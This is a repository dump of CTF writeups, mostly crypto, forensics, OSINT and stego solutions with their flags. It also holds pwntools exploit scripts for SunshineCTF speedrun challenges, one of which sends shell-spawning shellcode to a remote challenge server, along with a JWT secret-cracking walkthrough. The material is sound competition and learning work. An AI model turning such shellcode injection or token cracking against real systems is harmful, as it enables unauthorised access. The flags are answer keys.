14 |    0x0000555555554769 <+1>:	mov    rbp,rsp
15 |    0x000055555555476c <+4>:	sub    rsp,0x240
16 |    0x0000555555554773 <+11>:	lea    rdi,[rip+0xe6]        # 0x555555554860
17 |    0x000055555555477a <+18>:	call   0x5555555545d0 <puts@plt>
18 |    0x000055555555477f <+23>:	mov    rdx,QWORD PTR [rip+0x20088a]        # 0x555555755010 <stdin@@GLIBC_2.2.5>
19 |    0x0000555555554786 <+30>:	lea    rax,[rbp-0x40]
20 |    0x000055555555478a <+34>:	mov    esi,0x64
21 |    0x000055555555478f <+39>:	mov    rdi,rax
22 |    0x0000555555554792 <+42>:	call   0x5555555545f0 <fgets@plt>
23 |    0x0000555555554797 <+47>:	mov    rdx,QWORD PTR [rbp-0x8]
24 |    0x000055555555479b <+51>:	mov    eax,0x0
25 |    0x00005555555547a0 <+56>:	call   rdx
26 |    0x00005555555547a2 <+58>:	nop
27 |    0x00005555555547a3 <+59>:	leave
28 |    0x00005555555547a4 <+60>:	ret
29 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | main
 3 | ni
 4 | checksec
 5 | ni
 6 | telescope rdx
 7 | ni
 8 | ni
 9 | ni
10 | ni
11 | ni
12 | ni
13 | checksec
14 | ni
15 | ni
16 | start
17 | main
18 | ni
19 | checksec
20 | ni
21 | ni
22 | telescope $rbp0xd0
23 | telescope $rbp-0xd0
24 | nini
25 | ni
26 | ni
27 | ni
28 | c
29 | run
30 | start
31 | main
32 | ni
33 | ni
34 | aaaabaaacaaadaaaea
35 | ni
36 | ni
37 | ni
38 | q
39 | run
40 | ls
41 | ls
42 | start
43 | main
44 | ni
45 | ni
46 | ni
47 | ni
48 | ni
49 | ni
50 | ni
51 | p $rbp0xd0
52 | p $rbp-0xd0
53 | telescope $rdx
54 | ctx
55 | telescope $rbp-0xd0
56 | ctx
57 | telescope rdx
58 | p rdx
59 | p $rdx
60 | x/s $Rdx
61 | x/s $rdx
62 | ctx
63 | disassemble main
64 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/chall_07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/7/chall_07


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/7/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30007)
 6 | # sh = process('./chall_07')
 7 | 
 8 | sh.sendline('fuck')
 9 | 
10 | sh_code = asm(shellcraft.sh())
11 | sh.sendline(sh_code)
12 | 
13 | sh.interactive()
14 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/8/chall_08:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/8/chall_08


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/8/main.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/8/main.py


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/chall_09:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/9/chall_09


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30009)
 6 | # sh = process('./chall_09')
 7 | 
 8 | key = [0x79, 0x17, 0x46, 0x55, 0x10, 0x53, 0x5f, 0x5d, 0x55, 0x10, 0x58, 0x55, 0x42, 0x55, 0x10, 0x44, 0x5f, 0x3a]
 9 | text = [chr(k ^ 0x30) for k in key]
10 | print(text)
11 | 
12 | payload = "".join(text)
13 | print(payload) # I've come here to
14 | 
15 | sh.sendline(payload)
16 | sh.interactive()
17 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/9/payload


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/4li3n W4nt H3lp/README.md:
--------------------------------------------------------------------------------
 1 | # 4li3n W4nt H3lp
 2 | **category: Cryptography**<br>
 3 | **points: 100**
 4 | 
 5 | ## Description:
 6 | >An UFO crashed near the highway Petrol Pump and we find two aliens there they are critically injured and they are requesting for help. But we are not able to understanding their langauge so they write on the paper help us to decode their message.
 7 | <br>NOTE : hf0x01{Decoded_Message} PUT _ BETWEEN MESSAGE
 8 | 
 9 | 
10 | ## Solution
11 | >Given file is ![](chall.PNG)
12 | 
13 | >So,I searched about different alien languages and found that it is `Elder Futhark` cipher.After decoding cipher that in photo,I got flag.
14 | 
15 | hf0x01{AFTER_SOLVING_THIS_YOUR_ARE_ELIGIBLE_TO_JOIN_ANONYMOUS}
16 | 
17 | 
18 | 
19 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/4li3n W4nt H3lp/chall.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/4li3n W4nt H3lp/chall.PNG


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/README.md:
--------------------------------------------------------------------------------
 1 | # Anonymous
 2 | **category: Forensics**  
 3 | **points: 100**
 4 | 
 5 | ## Description
 6 | > Anonymous sended it's another message this year. But everyone doesn't know how they send a secret message through this video to their spy can you able to find it.
 7 | 
 8 | ## Solution
 9 | We are provided with [mp4](video.mp4) file. Listening it on `3:25` we get some noise. I went to https://www.dcode.fr/spectral-analysis to look for `spectogram` on `3:25` and i got the flag there
10 | 
11 | ![](spectogram.png)
12 | 
13 | FLAG : `hf0x01{FINALLY_Y0U_G0T_S3CR3T_MESSAg3}`
14 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/spectogram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Anonymous/spectogram.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/video.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Anonymous/video.mp4


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Base Fun/chall.txt:
--------------------------------------------------------------------------------
1 | QEgAAAoDAAAAALxtdFHz9fhaSgAAAEoAAAAIAAAAYmFzZS50eHQ5UkNqNWdVb0VXMTZWOTVSdHc3TDFjSE5FdHNMbzh5blZjS3NQSjZzWkViUHIyVVJmVXZvZVdoZFUzYXFhbmlHVThkY1FCcVhKa1BLAQI/AwoDAAAAALxtdFHz9fhaSgAAAEoAAAAIACQAAAAAAAAAIICkgQAAAABiYXNlLnR4dAoAIAAAAAAAAQAYAIDzxmBtv9YBgPi5pG2/1gGA88Zgbb/WAVBLBQYAAAAAAQABAFoAAABwAAAAAAA=
2 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Base Fun/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Base Fun/screenshot.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Binary or Not/README.md:
--------------------------------------------------------------------------------
 1 | # Binary or Not
 2 | 
 3 | **Points:150**\
 4 | **Cryptography**
 5 | 
 6 | ```
 7 | CipherText : 111111111100100010101011101011111110101111111111011011011011000001101001001001011110010100000000010100110111111111111111111110010100100101111111111111111110010100110110010101001010010010111001010011011110010100100100000000000000000010100000000000000000000000000000000000000000000000000000010101111111111111001010111111100101001111111111111111111111111110010100110000000000010100100100000000000000000000000000000000000010100110111110010100100010100101111111111110010100110110010100100100000000000000000000000000010100110110000000000010100100010100111110010100100100000000000000010100111111001010010111100101011111110010100000000000000000000000000000010101111001010011011000000001010000001010010010000000000000000000001010011000000000000001010010001010011011001010010010111111001010011001010111001010011111001010010010000000000000000000000000001010011011000000000001010010010110010100111111100101001100000000000000000000000000000000000000101001000000000000000000000000000101001011111100101001101111111111111100101001000101011100101001110010100100100000000000000000000010100110111110010100100101111001010111111100101001100000000000101000000000000000000000000101001111111111111111110010100100101111001010
 8 | ```
 9 | <br />
10 | <br />
11 | >It is spoon programing language.Because it starts with 1111111111.
12 | https://www.dcode.fr/spoon-language
13 | <br />
14 | <br />
15 | 
16 | Flag is **hf0x01{3very_0n3_z3r0_3ncrypt10n_n0t_b3l0ng$_t0_b1n4ry_XD}**
17 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Class Bunk Case/FLAG.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Class Bunk Case/FLAG.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Class Bunk Case/README.md:
--------------------------------------------------------------------------------
 1 | # Class Bunk Case
 2 | **category: OSINT**  
 3 | **points: 200**
 4 | 
 5 | ## Description
 6 | > Because of COVID pandemic my school is doing classes online.
 7 | > But I bunked all my classes and know I get warning from my teacher for that 
 8 | > And when I asked him for notes he send me the link. Will you help me to come out of this case.
 9 | > Link : https://docs.google.com/document/d/18J2GYPekm4WX6CiuPSF4L8U6sRoDeWAz1QeNh9pbrNc/edit?usp=sharing
10 | ## Solution
11 | After going to the link we get a note. In the note the word **past** is bolded a couple of times so following the conventional method of solving OSINT challenge, we go to wayback machine. We type the url of the file and we get one screen shot. After looking the screen shot we observed that a new string was added ***74unfgw***. It looked like a code to us. 
12 | By *notes* given by the teacher on **google docs**.We predicted that they will be using **google classroom** for their note sharing. Fortunately, the string we got before as the code worked and we got the flag.  
13 | ![](FLAG.png)
14 | 
15 | FLAG : `hf0x01{Dont_bunk_classes_w3_4r3_pu771ng_3ff0r7$_1n_17}`
16 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/1.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/2.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/3.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/4.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/README.md:
--------------------------------------------------------------------------------
 1 | # Do It Man
 2 | **category: Android**  
 3 | **points: 100**
 4 | 
 5 | ## Description
 6 | >Not To Hard toJust Do It and Show your All Rounder
 7 | 
 8 | ## Solution
 9 | I am a newbie in android.When I face with an android challenge,I use apk editor tool.
10 | First I select challenge apk file 
11 | <br>
12 | ![](1.jpg)
13 | ![](2.jpg)
14 | 
15 | ```I searched with flag format of this ctf.``` 
16 | ![](3.jpg)
17 | ![](4.jpg)
18 | 
19 | 
20 | ```flag:hf0x01{Y0u_4r3_n0w_B4s1c_4ndr01d}```
21 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/chall.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/chall.apk


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Fort Mystery/README.md:
--------------------------------------------------------------------------------
 1 | # Fort Mystery
 2 | **category: Cryptography**  
 3 | **points: 120**
 4 | 
 5 | ## Description
 6 | > Once a wise man said
 7 | > Don't compare the people on the basis of size what you compare between a bee and a fort, You have to fight if you want anything in your life there is no comparison 
 8 | > You have to fight for your dreams and your goals for everything :)
 9 | ## Solution
10 | We are provided with a cipher text `yd0j01{l0tyb_i0n_$0ik3f_na3_o0op_4te_s33_tkoo3ch}`. The challenge name looks suspicious so i googled cipher related to it. When i searched for `fort cipher` the first that appeared was `Beaufort Cipher`
11 | 
12 | So lets decode this on https://www.dcode.fr/beaufort-cipher. This cipher requires key to solve so i looked up for some words in discription and `fight` works for me
13 | 
14 | ![](decodefr.png)
15 | 
16 | FLAG : `hf0x01{w0ahh_y0u_$0lv3d_th3_f0rt_4nd_b33_myst3ry}`
17 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Fort Mystery/decodefr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Fort Mystery/decodefr.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mega Sale/flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mega Sale/flag.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mega Sale/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mega Sale/screenshot.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/README.md:
--------------------------------------------------------------------------------
 1 | # Mr Robot
 2 | **category: Forensics**  
 3 | **points: 100**
 4 | 
 5 | ## Description
 6 | > Elliot : By tonight i am gonna start my hack against E-Corp , after that no more the top 1% of the top 1% no one plays god without permission, nobody gonna control us
 7 | 
 8 | > Darlene : f0xscy help you when you needed
 9 | 
10 | > Elliot : ok i have to go , prepare for attack
11 | 
12 | ## Solution
13 | We are provided with [jpg](mrrobot.jpg) file and size of the file was `19mb` which is too much for just a image. So it was a clear indication that other files are hinding in this file so i used `steghide`,`binwalk`,`foremost` and foremost seems to work for this challenge.
14 | 
15 | ![](foremost.png)
16 | 
17 | we got a image and one zip file. There was nothing in the image so i turned to zip file and it was password protected and i remember the discription saying we need this`f0xscy` and it was the password for the zip. 
18 | 
19 | So now we have two folder, one with many flag.txt files and other one was hidden with having 3 folder in it. All flag.txt file were blank so we are left with 6 images. 3 images were correct and other 3 images have thier headers replaced. Correcting the headers of second image gave us the flag written on the image
20 | 
21 | ![](robot1.jpg)
22 | 
23 | FLAG : `hf0x01{y0u_c4m3_l0ng_w4y_mr_r0b0t_h4ck_w4$_c0mpl3ted}`
24 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/foremost.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/foremost.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/mrrobot.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/mrrobot.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/robot1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/robot1.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/New Encryption/Script.py:
--------------------------------------------------------------------------------
 1 | import hashlib
 2 | import string
 3 | 
 4 | with open('hash.txt') as f:
 5 |   fp = f.read()
 6 | 
 7 | md5_sum = ''
 8 | 
 9 | for j in range(0, len(fp), 40):
10 |   tmp = fp[j:j+40]
11 |   for i in '1234567890abcdef':
12 |     letter  = hashlib.sha1(i.encode()).hexdigest()
13 |     if letter == tmp:
14 |       md5_sum += i
15 | # print(md5_sum)
16 | 
17 | hsh = []
18 | for j in range(0, len(fp), 32):
19 |   hsh.append(md5_sum[j:j+32])
20 | 
21 | table = {}
22 | 
23 | for i in range(32, 127):
24 |   tmp = chr(i)
25 |   table[tmp] = hashlib.md5(tmp.encode()).hexdigest()
26 | 
27 | l = ''
28 | for i in hsh:
29 |   for j, k in table.items():
30 |     if i == k:
31 |       l += j
32 | print(l)
33 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/README.md:
--------------------------------------------------------------------------------
 1 | ## Next Target - Writeup :triangular_flag_on_post:
 2 | 
 3 | -----
 4 | 
 5 | **Category :  Cryptography**\
 6 | **Points : 100**\
 7 | **Author : @l3v1ath4n**
 8 | 
 9 | -----
10 | 
11 | #### # Description
12 | 
13 | ![chall](assets/chall.png)
14 | <br />
15 | <br />
16 | 
17 | #### # Symbols Cipher :balance_scale:
18 | <br />
19 | 
20 | ![symbols](assets/next-target.PNG)
21 | 
22 | Well at first glance the symbols seem to be symbols of `Zodiac`, we can easily find a table of the signs of the same and translate each sign.
23 | 
24 | ![table](https://i.servimg.com/u/f11/19/43/19/05/tm/ff552710.gif)
25 | 
26 | #### # **Flag :** 
27 | 
28 | ```hf0x01{NEXT_TARGET_WILL_BE_ONE_OF_THE_ADMINS_BUT_YOU_CANT_SAVE_ANYONE}``` :hand:
29 | 
30 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/assets/chall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Next Target/assets/chall.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/assets/next-target.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Next Target/assets/next-target.PNG


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/README.md:
--------------------------------------------------------------------------------
 1 | # Note on desk
 2 | **category: forensics**  
 3 | **points: 200**
 4 | 
 5 | ## Description
 6 | Our team get information that one hacker group is going to orgainze a meeting and they are planning which can be threat to the nation. So when we raided the house of one on the member of that hacker group we get lot's of pieces of paper on the desk. can you help us to find what is that message
 7 | 
 8 | ## Solution
 9 | We get a zip file from the challenge. Inside it is 599 JPGs each with a dimension of 1x600. Here's a python script to concatenate all the images together. The cv2 module can be installed with `pip install opencv-python`.
10 | ```python
11 | import cv2
12 | 
13 | images = [cv2.imread('robot-{}.jpg'.format(i)) for i in range(1, 600)]
14 | result = cv2.hconcat(images)
15 | cv2.imwrite('out.jpg', result)
16 | ```
17 | Here we can see the flag inside the image.  
18 | ![flag](out.jpg)
19 | 
20 | **FLAG:** `hf0x01{3nj0y_7h3_3v3ing_w17h_u$}`
21 | 
22 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/notes.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Note on desk/notes.zip


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/out.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Note on desk/out.jpg


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnfreak CTF 2020
 2 | <br />
 3 | <br />
 4 | 
 5 |  <a>
 6 |   <img src="logo.png" alt="logo">
 7 | </a>
 8 | 
 9 | <br />
10 | <br />
11 | 
12 | **Site** : https://ctf.vulnfreak.com
13 | 
14 | **Rank** : 4/81
15 | 
16 | ![](rank.png)
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/logo.png


--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/rank.png


--------------------------------------------------------------------------------
/2021/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/README.md:
--------------------------------------------------------------------------------
 1 | # Easy!!!
 2 | 
 3 | **Category**: Misc \
 4 | **Points**: 120
 5 | 
 6 | ## Discription
 7 | 
 8 | > A piece of cake for you : )
 9 | 
10 | ## Solution
11 | 
12 | We are given `uggcfzrtnamsvyrJLxJ2LMn#0GK1Iy9IWOfAsRCneIh0MOrNTugF8knPAO-nKX2xE7H` text. I tried some basic things and rot13 worked out
13 | 
14 | ![](rot13.png)
15 | 
16 | so we got a `mega.nz` link, i went over to the link and we got [file.txt](file.txt). Looking to file.txt content we know that it is hex encoded but decoding with hex was not working on it. so one of our team mate adviced to reverse the content and it worked out. then i decoded it with hex and we got an image.
17 | 
18 | ![](cyberchef.png)
19 | 
20 | We got a [jpeg file](index.jpeg). Without any doubt  i ran steghide on that image and we got [flag.txt](flag.txt)
21 | 
22 | FLAG : `cybergrabs{fin4lly_y0u_g07_th3_fl4g_nic3_buddy}`
23 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/cyberchef.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/flag.txt:
--------------------------------------------------------------------------------
1 | cybergrabs{fin4lly_y0u_g07_th3_fl4g_nic3_buddy}
2 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/index.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/index.jpeg


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/rot13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/rot13.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/steghide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/steghide.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Jasper/Jasper.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Jasper/Jasper.jpg


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Jasper/readme.md:
--------------------------------------------------------------------------------
 1 | # Jasper
 2 | 
 3 | **Category**: Forensic \
 4 | **Points**: 200
 5 | 
 6 | ## Description
 7 | 
 8 | > I like to play with image. Do you?
 9 | ## Solution
10 | 
11 | Given file is [jpg](Jasper.jpg).
12 | ![](Jasper.jpg)
13 | Just use `exiftool`` and take a flag.
14 | 
15 | # Flag is `cybergrabs{Y0U_4re_g00d_4t_m3ta_DaT4}`
16 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Cybergrab CTF 2021
2 | 
3 | **Site** : https://ctf.thecybergrabs.com
4 | 
5 | **Rank** : 9/224
6 | 
7 | ![](scoreboard.png)
8 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/README.md:
--------------------------------------------------------------------------------
 1 | # Wonderful Colours
 2 | 
 3 | **Category**: Misc \
 4 | **Points**: 150
 5 | 
 6 | ## Discription
 7 | 
 8 | > I love wonderful Colours.
 9 | 
10 | ## Solution
11 | 
12 | We are given a [png](colourfull.png) file. Looking to it we can see, it has boxes with 6 colors in each box. it is `hexahue code`
13 | 
14 | ![](colorcode.png)
15 | 
16 | Decode the challenge picture with this table and you will get the flag
17 | 
18 | you can get more information about `hexahue code` on https://www.boxentriq.com/code-breaking/hexahue
19 | 
20 | FLAG : `cybergrabs{w3h4ck3d1t}`
21 | 
22 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/colorcode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Wonderful Colours/colorcode.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/colourful.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Wonderful Colours/colourful.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/README.md:
--------------------------------------------------------------------------------
 1 | #  everyone intrested in my secret life ( ᴗ )
 2 | 
 3 | **Category**: Crypto \
 4 | **Points**: 150
 5 | 
 6 | ## Discription
 7 | 
 8 | > I Know you want to know the secrets of my life but it is not that much easy. I can only provide you some help you have to figure out it.
 9 | 
10 | ## Solution
11 | 
12 | We are given `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmbGFnIjoiY3liZXJncmFic3tOMHRfVDAwXzM0c1l9In0.I4zPop1KDT55QOE_QlEi-jh5TXg8nRjbnbDwq2VG1M8` text. Decoding it with base64 tell us that, it is jwt token with hs256 algorithm
13 | 
14 | ![](base64.png)
15 | 
16 | After some research on jwt tokens and jwt token cracking. I found a tool https://github.com/ticarpi/jwt_tool. Using it we can break jwt token to get the secret key
17 | so i used it with `rockyou.txt`.
18 | 
19 | ![](jwt_tool.png)
20 | 
21 | FLAG : `cybergrabs{perrademierda}`
22 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/base64.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/jwt_tool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/jwt_tool.png


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/follow/readme.md:
--------------------------------------------------------------------------------
 1 | # Follow
 2 | 
 3 | **Category**: Misc \
 4 | **Points**: 100
 5 | 
 6 | ## Discription
 7 | 
 8 | > 
 9 | 
10 | Follow the author.
11 | 
12 | flag format: cybergrabs{}
13 | 
14 | Author: sc4ry_gh0st
15 | 
16 | 
17 | ## Solution
18 | 
19 | I checked author name "sc4ry_gh0st" in twitter. He has a post ```Ｈｏpe 
20 | ｔhⅰs  ｙear  wіll  be  good.
21 | Happy New Year``` . I copied this text and decoded it in  this site ```https://holloway.nz/steg/ ``` 
22 | got this ```tvigt6```
23 | ## Flag is cybergrabs{tvigt6}
24 | 


--------------------------------------------------------------------------------
/2021/cybergrab_ctf/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/scoreboard.png


--------------------------------------------------------------------------------
/2022/CybergrabsCTF/README.md:
--------------------------------------------------------------------------------
1 | # CyberGrabs CTF 2022
2 | 
